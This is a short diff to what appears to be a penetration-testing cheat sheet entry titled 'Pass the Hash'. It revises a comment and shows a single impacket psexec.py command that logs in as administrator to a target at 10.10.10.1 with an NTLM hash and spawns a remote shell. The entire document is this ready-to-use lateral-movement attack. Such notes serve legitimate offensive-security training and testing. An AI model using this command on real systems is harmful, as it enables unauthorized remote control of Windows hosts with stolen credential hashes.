 Pass the Hash

-# psexec with NTLM hash (no plaintext password needed)
+# PSExec — spawn a shell using an NTLM hash (no plaintext password needed)

 python3 psexec.py administrator@10.10.10.1 -hashes :NTLM_HASH